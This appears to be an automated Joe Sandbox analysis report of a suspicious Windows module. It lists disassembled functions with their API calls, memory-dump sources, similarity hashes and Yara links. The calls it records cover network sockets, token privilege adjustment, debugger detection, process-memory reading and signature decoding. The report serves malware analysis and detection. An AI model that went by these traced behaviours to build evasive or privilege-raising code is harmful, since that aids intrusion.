                                                                                                                                        • Part of subcall function 69E8D970: socket.WS2_32(00000002,00000001,00000000), ref: 69E8D995
                                                                                                                                        • Part of subcall function 69E8D970: ioctlsocket.WS2_32 ref: 69E8D9B1
                                                                                                                                        • Part of subcall function 69E8D970: htons.WS2_32(?), ref: 69E8D9E1
                                                                                                                                        • Part of subcall function 69E8D970: inet_addr.WS2_32(?), ref: 69E8DA15
                                                                                                                                        • Part of subcall function 69E8D970: connect.WS2_32(?,?,00000010), ref: 69E8DA30
                                                                                                                                      • _memset.LIBCMT ref: 69E8E95D
                                                                                                                                      • _memset.LIBCMT ref: 69E8E97A
                                                                                                                                        • Part of subcall function 69E8D5F0: _memset.LIBCMT ref: 69E8D620
                                                                                                                                        • Part of subcall function 69E8D5F0: _swscanf.LIBCMT ref: 69E8D669
                                                                                                                                      • closesocket.WS2_32(?), ref: 69E8EA24
                                                                                                                                      • closesocket.WS2_32(?), ref: 69E8EA53
                                                                                                                                        • Part of subcall function 69E8DC90: _memset.LIBCMT ref: 69E8DCE5
                                                                                                                                        • Part of subcall function 69E8DC90: select.WS2_32 ref: 69E8DD1D
                                                                                                                                      • closesocket.WS2_32(?), ref: 69E8EA84
                                                                                                                                      • closesocket.WS2_32(?), ref: 69E8EAB3
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memsetclosesocket$_swscanfconnecthtonsinet_addrioctlsocketselectsocket
                                                                                                                                      • String ID: P
                                                                                                                                      • API String ID: 1656721356-3110715001
                                                                                                                                      • Opcode ID: 449503a599af7321e50c919b5e6b532859e4ea4094281bafe0eb3e4e0852bb14
                                                                                                                                      • Instruction ID: 238135a4757d88f26e7b6dbe3617e15fc1a7643ec8287b41ddc7a3acdf95daf9
                                                                                                                                      • Opcode Fuzzy Hash: 449503a599af7321e50c919b5e6b532859e4ea4094281bafe0eb3e4e0852bb14
                                                                                                                                      • Instruction Fuzzy Hash: 60512835604741AFD720DFA4D695AEBB7E4BF85308F6089AED48EC7201EB30E50D8B91
                                                                                                                                      Function 69EBC474 Relevance: 12.1, APIs: 8, Instructions: 125filestringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 69EBC47E
                                                                                                                                      • GetFullPathNameA.KERNEL32(00000000,00000104,00000000,?,00000158,69EBC703,?,00000000,?,00000000,00000104,00000000,00000000,?,?), ref: 69EBC4BC
                                                                                                                                        • Part of subcall function 69EAF4C1: __CxxThrowException@8.LIBCMT ref: 69EAF4D7
                                                                                                                                        • Part of subcall function 69EAF4C1: __EH_prolog3.LIBCMT ref: 69EAF4E4
                                                                                                                                      • PathIsUNCA.SHLWAPI(?,00000000,?,?,?), ref: 69EBC52C
                                                                                                                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 69EBC553
                                                                                                                                      • CharUpperA.USER32(00000000), ref: 69EBC586
                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 69EBC5A2
                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 69EBC5AE
                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 69EBC5CC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 624941980-0
                                                                                                                                      • Opcode ID: d5ead4be09adb27fb5a6689df85a747672add98f3e5edf4a548a46f3c7698551
                                                                                                                                      • Instruction ID: 48f6778e813124b3916f4c0da1d6a8384536cb50b63bd70713a72101bed76574
                                                                                                                                      • Opcode Fuzzy Hash: d5ead4be09adb27fb5a6689df85a747672add98f3e5edf4a548a46f3c7698551
                                                                                                                                      • Instruction Fuzzy Hash: 7E41C371A04515DBDF25CFA8CE48BEE7778AF46319F20519CE81AA9294DF348A84CF10
                                                                                                                                      Function 69E87E30 Relevance: 12.1, APIs: 8, Instructions: 56COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 69E87E3B
                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 69E87E42
                                                                                                                                      • LookupPrivilegeValueA.ADVAPI32 ref: 69E87E6C
                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,69E87EF2,SeAssignPrimaryTokenPrivilege), ref: 69E87E7B
                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000,?,?,?,?,?,?,?,?,?,69E87EF2), ref: 69E87E9A
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,69E87EF2,SeAssignPrimaryTokenPrivilege), ref: 69E87EA2
                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,69E87EF2,SeAssignPrimaryTokenPrivilege), ref: 69E87EB5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3435690185-0
                                                                                                                                      • Opcode ID: 32f01ec620cccd268aa020051ba3ad0becececd751e7e8e19b4af69350314a3e
                                                                                                                                      • Instruction ID: 194e44aadb04634a985984cd101669eed776b4eb0cf1870c3a5e0e150d6309b8
                                                                                                                                      • Opcode Fuzzy Hash: 32f01ec620cccd268aa020051ba3ad0becececd751e7e8e19b4af69350314a3e
                                                                                                                                      • Instruction Fuzzy Hash: C8118E75A54300ABE700DFB4DE4EB5B37A8BF86B14F44881CF549C6281E675D9088BA2
                                                                                                                                      Function 69E9EF50 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 452COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E9EF7F
                                                                                                                                      • _memset.LIBCMT ref: 69E9EF93
                                                                                                                                      • _memset.LIBCMT ref: 69E9EFAD
                                                                                                                                        • Part of subcall function 69E9E110: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 69E9E14C
                                                                                                                                        • Part of subcall function 69E9E510: CoCreateInstance.OLE32(69EDDF60,00000000,00000001,69EDDF50,585FE9A6), ref: 69E9E536
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$CreateInstanceLibraryLoad
                                                                                                                                      • String ID: ...$.....$0.0
                                                                                                                                      • API String ID: 1730192913-2035250324
                                                                                                                                      • Opcode ID: baac545a12f41992e87e421cb805c28b5bd58e42b4bab6992cf2e424f8f5ca7a
                                                                                                                                      • Instruction ID: 19d9762765b00f5bc3d90643c5a2b355c2af8f19ea6b8e38069fbc851aa52b4d
                                                                                                                                      • Opcode Fuzzy Hash: baac545a12f41992e87e421cb805c28b5bd58e42b4bab6992cf2e424f8f5ca7a
                                                                                                                                      • Instruction Fuzzy Hash: EEE1F9BA61420067DB14C7259D82BBF73DD7F9821DFA48D2EF46CC6241FB3AD6488152
                                                                                                                                      Function 69EA0D20 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryA.KERNEL32 ref: 69EA0D40
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 69EA0D52
                                                                                                                                      • ReadProcessMemory.KERNEL32(?,00000000,00000000,00000004,00000000), ref: 69EA0D6E
                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 69EA0D85
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Library$AddressFreeLoadMemoryProcProcessRead
                                                                                                                                      • String ID: ShowWindow$user32.dll
                                                                                                                                      • API String ID: 4079270797-767597475
                                                                                                                                      • Opcode ID: 916a01d5924a93bfabece4e0a7141a35e05ac29e7c9952eafdc86e153e02252f
                                                                                                                                      • Instruction ID: 5b5a93619955d2b9093693f74b49e52463225542e6c71fd044f497793e6ad0db
                                                                                                                                      • Opcode Fuzzy Hash: 916a01d5924a93bfabece4e0a7141a35e05ac29e7c9952eafdc86e153e02252f
                                                                                                                                      • Instruction Fuzzy Hash: 7CF08172A09390ABDB11DB7A9C08B5F7EA9AFC6621F04891DF454C7250D734D50CC7A6
                                                                                                                                      Function 69EA4360 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128encryptionmemorystringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • lstrcmpA.KERNEL32(1.3.6.1.4.1.311.2.1.12,00000000,585FE9A6,00000000,00000000,7569A0C0,00000000,69EC5490,69EE9550,000000FE,?,69EA45B7,?), ref: 69EA43BC
                                                                                                                                      • CryptDecodeObject.CRYPT32(00010001,1.3.6.1.4.1.311.2.1.12,?,?,00000000,00000000,?), ref: 69EA43F0
                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 69EA4400
                                                                                                                                      • CryptDecodeObject.CRYPT32(00010001,1.3.6.1.4.1.311.2.1.12,?,?,00000000,?,?), ref: 69EA4433
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CryptDecodeObject$AllocLocallstrcmp
                                                                                                                                      • String ID: 1.3.6.1.4.1.311.2.1.12
                                                                                                                                      • API String ID: 3284379815-2596186611
                                                                                                                                      • Opcode ID: a14aa8f730fd86ef56f444ad671c7bb9a90846211e456fe5afed1cfe20a6afdc
                                                                                                                                      • Instruction ID: 899a455b650b62a7edc016ab95a345c937077189e5c0cab65959feec89308451
                                                                                                                                      • Opcode Fuzzy Hash: a14aa8f730fd86ef56f444ad671c7bb9a90846211e456fe5afed1cfe20a6afdc
                                                                                                                                      • Instruction Fuzzy Hash: 8D4170B1900615DFDB10CF59C980A5AB7F9FF89358F20816AE815AF375EB71E841CB90
                                                                                                                                      Function 69EBE9D7 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 69EC6A1A
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 69EC6A2F
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(69EDC6F0), ref: 69EC6A3A
                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 69EC6A56
                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 69EC6A5D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                      • Opcode ID: b572f9e07cb947f7512230cf4e799bd4c8b10c2ed265de65ee7d7616c5aebc21
                                                                                                                                      • Instruction ID: b71acf702c89d334ef70d8d0b2faf281c65e8720e7b69a7af9150e001c31c145
                                                                                                                                      • Opcode Fuzzy Hash: b572f9e07cb947f7512230cf4e799bd4c8b10c2ed265de65ee7d7616c5aebc21
                                                                                                                                      • Instruction Fuzzy Hash: 7D21EEF9C44288DFCF02DFA5E645A983BB1FB9A355F60511BE40987380E7B25985CF41
                                                                                                                                      Function 69E85B00 Relevance: 6.0, APIs: 4, Instructions: 40fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetFileSize.KERNEL32(?,?,?,?,?,?,69E8184E,?), ref: 69E85B2A
                                                                                                                                      • SetFilePointer.KERNEL32(00000000,-000000FC,00000000,00000001,?,?,?,?,?,?,69E8184E,?), ref: 69E85B39
                                                                                                                                      • __aullrem.LIBCMT ref: 69E85B4C
                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000,?,000000FF,00000000,?,?,?,?,?,?,69E8184E), ref: 69E85B6A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$PointerSizeWrite__aullrem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2200587376-0
                                                                                                                                      • Opcode ID: 7abeb3b73ecde093d8bb6e89a6afc0a454a8108a58376bed0e7a3506069f3a81
                                                                                                                                      • Instruction ID: 9fe6ac47ac3dd70b2f0878add2d093293bc4b0fcbce204c9414aea93af3aeb59
                                                                                                                                      • Opcode Fuzzy Hash: 7abeb3b73ecde093d8bb6e89a6afc0a454a8108a58376bed0e7a3506069f3a81
                                                                                                                                      • Instruction Fuzzy Hash: 9EF0F470448340BEE200EB64DD49FBBBAE8AFC5F14F40891CF194860C1D7B4850C87A3
                                                                                                                                      Function 69E9B8D0 Relevance: 4.6, APIs: 3, Instructions: 56sleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetTickCount.KERNEL32 ref: 69E9B8EC
                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,69E9B995), ref: 69E9B905
                                                                                                                                      • GetTickCount.KERNEL32 ref: 69E9B90B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
